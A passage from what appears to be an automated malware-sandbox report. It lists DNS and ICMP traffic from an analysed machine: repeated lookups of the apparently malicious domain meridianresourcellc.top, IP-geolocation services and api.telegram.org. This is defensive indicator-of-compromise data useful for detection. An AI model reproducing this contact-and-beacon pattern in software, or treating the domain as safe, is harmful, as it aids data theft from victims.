                                              Jul 26, 2024 23:45:42.186707020 CEST53503378.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:42.250423908 CEST5033753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:42.257505894 CEST53503378.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:42.480201960 CEST6182653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:42.486668110 CEST53618268.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:42.525684118 CEST5632953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:42.532221079 CEST53563298.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:42.533655882 CEST6346953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:42.536890030 CEST5944753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:42.540035009 CEST53634698.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:42.543221951 CEST53594478.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:43.332685947 CEST5182853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:43.339736938 CEST53518288.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:44.129057884 CEST5340653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:44.136018991 CEST53534068.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:44.321737051 CEST5340653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:44.328207016 CEST53534068.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:44.405365944 CEST5634553192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:44.408076048 CEST5187053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:44.412067890 CEST53563458.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:44.418123960 CEST53518708.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:45.065634966 CEST6500953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:45.075834036 CEST53650098.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:45.158632994 CEST6495653192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:45.164971113 CEST53649568.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:45.166779041 CEST5452153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:45.173413992 CEST53545218.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:45.690232992 CEST4975053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:45.697089911 CEST53497508.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:45.698802948 CEST6468753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:45.706389904 CEST53646878.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:46.552696943 CEST6508453192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:46.560062885 CEST53650848.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:46.880353928 CEST6337353192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:46.887716055 CEST53633738.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:46.887924910 CEST6337353192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:46.894819975 CEST53633738.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:47.240937948 CEST5620753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:47.247642994 CEST53562078.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:47.501458883 CEST5195553192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:47.507905006 CEST53519558.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:47.510821104 CEST5897153192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:47.518174887 CEST53589718.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:48.004776001 CEST5101453192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:48.018521070 CEST53510148.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:48.681628942 CEST4969053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:48.689132929 CEST53496908.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:48.691155910 CEST6016953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:48.697443008 CEST53601698.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:49.384118080 CEST5306053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:49.391303062 CEST53530608.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:50.050956964 CEST4994953192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:50.057598114 CEST53499498.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:50.059477091 CEST5402753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:50.065959930 CEST53540278.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:51.692125082 CEST6395053192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:51.699316978 CEST53639508.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:52.378108978 CEST5825753192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:52.384382010 CEST53582578.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:52.386624098 CEST5473853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:52.393100023 CEST53547388.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:52.866657019 CEST4947853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:52.873044968 CEST53494788.8.8.8192.168.2.22
                                              Jul 26, 2024 23:45:53.523926973 CEST4928853192.168.2.228.8.8.8
                                              Jul 26, 2024 23:45:53.530426979 CEST53492888.8.8.8192.168.2.22

                                              ICMP Packets

                                              TimestampSource IPDest IPChecksumCodeType
                                              Jul 26, 2024 23:45:04.934621096 CEST192.168.2.228.8.8.8d02d(Port unreachable)Destination Unreachable

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 26, 2024 23:45:03.630995989 CEST192.168.2.228.8.8.80xed0bStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:04.632219076 CEST192.168.2.228.8.8.80xed0bStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:06.556224108 CEST192.168.2.228.8.8.80x61f5Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:07.464293003 CEST192.168.2.228.8.8.80x6ccdStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:12.067383051 CEST192.168.2.228.8.8.80x1100Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:12.079323053 CEST192.168.2.228.8.8.80x2664Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:13.343615055 CEST192.168.2.228.8.8.80xb6ecStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:13.353574038 CEST192.168.2.228.8.8.80xd97eStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:14.731673956 CEST192.168.2.228.8.8.80x9c5bStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:14.748781919 CEST192.168.2.228.8.8.80x4189Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:19.707108021 CEST192.168.2.228.8.8.80xeec9Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:24.043891907 CEST192.168.2.228.8.8.80x2383Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:24.053987980 CEST192.168.2.228.8.8.80x1185Standard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:27.972532034 CEST192.168.2.228.8.8.80x98abStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.104296923 CEST192.168.2.228.8.8.80xae0fStandard query (0)meridianresourcellc.topA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.175985098 CEST192.168.2.228.8.8.80x63c0Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.237948895 CEST192.168.2.228.8.8.80xe435Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:30.739588022 CEST192.168.2.228.8.8.80x3571Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.180413008 CEST192.168.2.228.8.8.80x2a3fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.197536945 CEST192.168.2.228.8.8.80xc284Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.707544088 CEST192.168.2.228.8.8.80x94d0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.460616112 CEST192.168.2.228.8.8.80x5323Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.615905046 CEST192.168.2.228.8.8.80x1d8fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.718583107 CEST192.168.2.228.8.8.80xfd5dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.768357038 CEST192.168.2.228.8.8.80xa5e4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:37.864142895 CEST192.168.2.228.8.8.80xa29aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.764463902 CEST192.168.2.228.8.8.80xbb4cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.834836960 CEST192.168.2.228.8.8.80xc49Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:39.856924057 CEST192.168.2.228.8.8.80xc49Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:40.729053974 CEST192.168.2.228.8.8.80x3cadStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.384654999 CEST192.168.2.228.8.8.80x8630Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.401381969 CEST192.168.2.228.8.8.80x8630Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.412700891 CEST192.168.2.228.8.8.80xc693Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.523608923 CEST192.168.2.228.8.8.80xafa5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:41.535685062 CEST192.168.2.228.8.8.80xafa5Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.179760933 CEST192.168.2.228.8.8.80xfa66Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.250423908 CEST192.168.2.228.8.8.80xfa66Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.480201960 CEST192.168.2.228.8.8.80x6749Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.525684118 CEST192.168.2.228.8.8.80xc764Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.533655882 CEST192.168.2.228.8.8.80xf05dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:42.536890030 CEST192.168.2.228.8.8.80x916Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:43.332685947 CEST192.168.2.228.8.8.80x49fbStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.129057884 CEST192.168.2.228.8.8.80x2302Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.321737051 CEST192.168.2.228.8.8.80x2302Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.405365944 CEST192.168.2.228.8.8.80x68beStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:44.408076048 CEST192.168.2.228.8.8.80x6dc6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.065634966 CEST192.168.2.228.8.8.80x2ef7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.158632994 CEST192.168.2.228.8.8.80xc927Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.166779041 CEST192.168.2.228.8.8.80xd5c4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.690232992 CEST192.168.2.228.8.8.80x473aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:45.698802948 CEST192.168.2.228.8.8.80x29feStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.552696943 CEST192.168.2.228.8.8.80xdd21Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.880353928 CEST192.168.2.228.8.8.80x9609Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:46.887924910 CEST192.168.2.228.8.8.80x9609Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.240937948 CEST192.168.2.228.8.8.80x104aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.501458883 CEST192.168.2.228.8.8.80xcbffStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:47.510821104 CEST192.168.2.228.8.8.80x1edcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.004776001 CEST192.168.2.228.8.8.80x7bf8Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.681628942 CEST192.168.2.228.8.8.80x844aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:48.691155910 CEST192.168.2.228.8.8.80xaf79Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:49.384118080 CEST192.168.2.228.8.8.80x92bdStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.050956964 CEST192.168.2.228.8.8.80x2dabStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:50.059477091 CEST192.168.2.228.8.8.80xe0deStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:51.692125082 CEST192.168.2.228.8.8.80x5c7fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.378108978 CEST192.168.2.228.8.8.80x7b1eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.386624098 CEST192.168.2.228.8.8.80xe4aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:52.866657019 CEST192.168.2.228.8.8.80x960Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:53.523926973 CEST192.168.2.228.8.8.80x4e26Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 26, 2024 23:45:04.830096960 CEST8.8.8.8192.168.2.220xed0bNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:04.830096960 CEST8.8.8.8192.168.2.220xed0bNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:04.934381962 CEST8.8.8.8192.168.2.220xed0bNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:04.934381962 CEST8.8.8.8192.168.2.220xed0bNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:07.462266922 CEST8.8.8.8192.168.2.220x61f5No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:07.462266922 CEST8.8.8.8192.168.2.220x61f5No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:07.840570927 CEST8.8.8.8192.168.2.220x6ccdNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:07.840570927 CEST8.8.8.8192.168.2.220x6ccdNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:12.076077938 CEST8.8.8.8192.168.2.220x1100No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:12.076077938 CEST8.8.8.8192.168.2.220x1100No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:12.181380987 CEST8.8.8.8192.168.2.220x2664No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:12.181380987 CEST8.8.8.8192.168.2.220x2664No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:13.351985931 CEST8.8.8.8192.168.2.220xb6ecNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:13.351985931 CEST8.8.8.8192.168.2.220xb6ecNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:13.458283901 CEST8.8.8.8192.168.2.220xd97eNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:13.458283901 CEST8.8.8.8192.168.2.220xd97eNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:14.743086100 CEST8.8.8.8192.168.2.220x9c5bNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:14.743086100 CEST8.8.8.8192.168.2.220x9c5bNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:14.845243931 CEST8.8.8.8192.168.2.220x4189No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:14.845243931 CEST8.8.8.8192.168.2.220x4189No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:19.716862917 CEST8.8.8.8192.168.2.220xeec9No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:19.716862917 CEST8.8.8.8192.168.2.220xeec9No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:24.051151037 CEST8.8.8.8192.168.2.220x2383No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:24.051151037 CEST8.8.8.8192.168.2.220x2383No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:24.060973883 CEST8.8.8.8192.168.2.220x1185No error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:24.060973883 CEST8.8.8.8192.168.2.220x1185No error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:27.979532957 CEST8.8.8.8192.168.2.220x98abNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:27.979532957 CEST8.8.8.8192.168.2.220x98abNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.114315033 CEST8.8.8.8192.168.2.220xae0fNo error (0)meridianresourcellc.top104.21.52.88A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.114315033 CEST8.8.8.8192.168.2.220xae0fNo error (0)meridianresourcellc.top172.67.197.72A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.185820103 CEST8.8.8.8192.168.2.220x63c0No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:28.251365900 CEST8.8.8.8192.168.2.220xe435No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:30.750123978 CEST8.8.8.8192.168.2.220x3571No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:30.750123978 CEST8.8.8.8192.168.2.220x3571No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.186748981 CEST8.8.8.8192.168.2.220x2a3fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.203803062 CEST8.8.8.8192.168.2.220xc284No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.718290091 CEST8.8.8.8192.168.2.220x94d0No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:35.718290091 CEST8.8.8.8192.168.2.220x94d0No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.466989040 CEST8.8.8.8192.168.2.220x5323No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.624397993 CEST8.8.8.8192.168.2.220x1d8fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.725044966 CEST8.8.8.8192.168.2.220xfd5dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 26, 2024 23:45:36.774833918 CEST8.8.8.8192.168.2.220xa5e4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
